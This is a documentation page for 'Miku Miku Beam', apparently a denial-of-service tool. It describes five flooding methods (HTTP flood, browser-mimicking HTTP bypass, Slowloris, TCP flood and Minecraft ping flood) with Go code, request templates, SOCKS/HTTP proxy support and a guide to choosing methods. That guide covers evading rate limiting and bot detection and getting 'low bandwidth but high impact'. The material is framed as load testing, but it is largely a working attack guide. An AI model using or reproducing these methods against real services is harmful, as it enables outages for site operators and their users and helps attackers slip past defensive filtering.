Skip to main content

Available Methods

Miku Miku Beam implements five distinct attack methods, each designed for different use cases and network layers.

HTTP Flood

High-volume HTTP requests with GET/POST methods

HTTP Bypass

Browser-mimicking requests to bypass basic protections

Slowloris

Slow header transmission to exhaust server resources

TCP Flood

Raw TCP packet flooding for Layer 4 testing

Minecraft Ping

Minecraft server status request flooding

HTTP Flood

Method ID: http_flood
Protocol: HTTP/HTTPS
Supported Proxies: HTTP, HTTPS, SOCKS4, SOCKS5

Implementation

Location: internal/attacks/http/flood.go

Strategy

Sends rapid HTTP requests alternating between GET and POST methods based on packet size:
  • Small packets (≤512 bytes): 50% GET, 50% POST
  • Large packets (>512 bytes): Primarily POST
isGet := params.PacketSize <= 512 && rand.Intn(2) == 0

Request Patterns

GET Requests: Payload appended to URL path 
GET /target/path/<random_payload> HTTP/1.1
Host: example.com
User-Agent: <random_user_agent>
POST Requests: Payload in request body 
POST /target/path HTTP/1.1
Host: example.com
User-Agent: <random_user_agent>
Content-Length: <packet_size>

<random_payload>

Payload Generation

Random alphanumeric strings using characters a-zA-Z0-9: 
func randomString(n int) string {
    const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
    b := make([]byte, n)
    for i := range b {
        b[i] = letters[rand.Intn(len(letters))]
    }
    return string(b)
}

Characteristics

  • Timeout: 5 seconds per request
  • Redirects: Follows up to 3 redirects
  • TLS: Accepts all certificates (InsecureSkipVerify: true)
  • Response handling: Body discarded immediately to free resources
HTTP Flood is optimized for maximum request rate. Responses are read and discarded without processing.

HTTP Bypass

Method ID: http_bypass
Protocol: HTTP/HTTPS
Supported Proxies: HTTP, HTTPS, SOCKS4, SOCKS5

Implementation

Location: internal/attacks/http/bypass.go

Strategy

Mimics legitimate browser traffic to bypass basic rate limiting and bot detection:
  • Randomized URL paths with realistic extensions
  • Browser-like headers (Accept, Accept-Language, Accept-Encoding)
  • Referer headers (same-origin or popular sites)
  • Randomized cookies
  • 80% GET, 20% POST distribution

Path Randomization

// Examples of generated paths:
// abc123.js
// def456/xyz9.css
// ghi789.png
// jkl012  (no extension)
Extensions include: .js, .css, .png, .jpg, .svg, or none

Header Mimicking

GET /abc123/xyz9.js?_=vwx45678 HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.google.com
Cookie: _ga=abc12345; _gid=def67890

Referer Generation

50% same-origin, 50% popular sites: 
refs := []string{
    "https://www.google.com",
    "https://www.youtube.com",
    "https://twitter.com"
}

Characteristics

  • Timeout: 6 seconds per request
  • Redirects: Follows up to 3 redirects
  • Query strings: 50% include random cache-busting parameter
  • Cookies: 50% include Google Analytics-like cookies
HTTP Bypass sacrifices some speed for stealth, appearing more like legitimate traffic patterns.

HTTP Slowloris

Method ID: http_slowloris
Protocol: HTTP/HTTPS
Supported Proxies: SOCKS4, SOCKS5 only

Implementation

Location: internal/attacks/http/slowloris.go

Strategy

Opens connections and sends HTTP headers slowly, never completing the request. This exhausts server connection pools by holding connections open indefinitely.
HTTP/HTTPS proxies are NOT supported. Only SOCKS proxies work because this attack requires raw TCP control.

Attack Flow

  1. Establish TCP/TLS connection to target
  2. Send initial request line: 
    GET / HTTP/1.1\r\n
  3. Dribble headers slowly (one per PacketDelay interval): 
    Host: example.com\r\n
<delay>
User-Agent: Mozilla/5.0...\r\n
<delay>
Accept: */*\r\n
<delay>
Connection: keep-alive\r\n
<delay>
  4. Never send final \r\n to complete headers
  5. Keep-alive packets: Send dummy headers periodically 
    X-a: b\r\n

Connection Lifecycle

Each Fire() call spawns a goroutine that maintains the connection: 
go func(c net.Conn) {
    defer c.Close()
    // Send request line
    fmt.Fprintf(bw, "GET / HTTP/1.1\r\n")
    // Dribble headers
    for _, h := range headers {
        bw.WriteString(h + "\r\n")
        bw.Flush()
        time.Sleep(params.PacketDelay)
    }
    // Send keep-alive indefinitely
    ticker := time.NewTicker(params.PacketDelay)
    for {
        <-ticker.C
        bw.WriteString("X-a: b\r\n")
        bw.Flush()
    }
}(conn)

Characteristics

  • Connection duration: Indefinite (until attack stops or server closes)
  • Resource consumption: Minimal bandwidth, maximum connection slots
  • TLS support: Automatically wraps HTTPS targets with TLS
  • Header rate: Controlled by PacketDelay parameter
Slowloris is most effective against servers with low connection limits. Modern servers with proper timeouts may be resistant.

TCP Flood

Method ID: tcp_flood
Protocol: TCP (Layer 4)
Supported Proxies: SOCKS4, SOCKS5 only

Implementation

Location: internal/attacks/tcp/flood.go

Strategy

Establishes TCP connections and sends bursts of random binary data, testing network and application layer capacity.

Attack Flow

  1. Parse target as host:port (no URL scheme)
  2. Establish TCP connection (with optional SOCKS proxy)
  3. Generate random bytes using crypto/rand
  4. Send initial burst of PacketSize bytes (default 512)
  5. Send additional bursts (1-3 random count)
  6. Close connection
size := params.PacketSize
if size <= 0 {
    size = 512
}
buf := make([]byte, size)
rand.Read(buf)  // crypto/rand for high entropy
conn.Write(buf)

// Send 1-3 additional bursts
bursts := minInt(3, 1+randIntn(3))
for i := 0; i < bursts; i++ {
    rand.Read(buf)
    conn.Write(buf)
}

Characteristics

  • Write deadline: 2 seconds
  • Payload: Cryptographically random bytes
  • Burst count: 1-4 total writes per connection
  • Connection lifecycle: Short-lived, closed after bursts
TCP Flood targets Layer 4. Use this for testing network infrastructure, firewalls, and TCP-based services.

Minecraft Ping

Method ID: minecraft_ping
Protocol: Minecraft Server List Ping (TCP)
Supported Proxies: SOCKS4, SOCKS5 only

Implementation

Location: internal/attacks/game/minecraft_ping.go

Strategy

Sends legitimate Minecraft server status requests following the Server List Ping protocol. This tests Minecraft server capacity to handle status queries.

Protocol Implementation

Follows Minecraft protocol specification (protocol version 754): 1. Handshake Packet (0x00): 
Packet ID: 0x00
Protocol Version: VarInt (754)
Server Address: String (hostname)
Server Port: Unsigned Short (big-endian)
Next State: VarInt (0x01 = status)
2. Status Request Packet (0x00): 
Length: VarInt (0x01)
Packet ID: 0x00

Packet Construction

const protoVersion = 754
var pkt bytes.Buffer
pkt.WriteByte(0x00)                                // packet id
writeVarInt(&pkt, protoVersion)                    // protocol version
writeString(&pkt, host)                            // server address
binary.Write(&pkt, binary.BigEndian, uint16(port)) // server port
writeVarInt(&pkt, 0x01)                            // next state: status

// Frame with length prefix
var framed bytes.Buffer
writeVarInt(&framed, pkt.Len())
framed.Write(pkt.Bytes())

VarInt Encoding

Minecraft uses variable-length integer encoding: 
func writeVarInt(w io.ByteWriter, value int) {
    for {
        b := byte(value & 0x7F)
        value >>= 7
        if value != 0 {
            b |= 0x80
        }
        w.WriteByte(b)
        if value == 0 {
            break
        }
    }
}

Port Defaulting

Automatically uses Minecraft’s default port: 
if tn.Scheme == "" && port == 80 {
    port = 25565  // Minecraft default
}

Characteristics

  • Connection timeout: 3 seconds
  • Response handling: Reads and discards 256 bytes + 64 bytes
  • Protocol compliance: Fully compliant with Minecraft Server List Ping
  • Target format: hostname:port or just hostname (uses 25565)
This attack is specific to Minecraft servers and won’t affect non-Minecraft services, even if they listen on port 25565.

Proxy Compatibility Matrix

MethodHTTP/HTTPS ProxySOCKS4/5 Proxy
HTTP Flood
HTTP Bypass
HTTP Slowloris
TCP Flood
Minecraft Ping
Layer 4 attacks (Slowloris, TCP Flood, Minecraft Ping) require direct TCP control and only work with SOCKS proxies.

Method Selection Guide

Use HTTP Flood when:

  • Maximum request rate is the priority
  • Testing raw HTTP server capacity
  • Target has no bot protection

Use HTTP Bypass when:

  • Target has basic rate limiting or bot detection
  • Need to blend in with legitimate traffic
  • Testing WAF or security rules

Use Slowloris when:

  • Testing connection pool limits
  • Target has limited concurrent connection capacity
  • Low bandwidth but high impact needed

Use TCP Flood when:

  • Testing Layer 4 infrastructure
  • Target is a TCP service (not HTTP)
  • Firewall or DDoS protection testing

Use Minecraft Ping when:

  • Target is a Minecraft server
  • Testing query handling capacity
  • Legitimate protocol compliance required

Build docs developers (and LLMs) love

Get started for freeTalk to us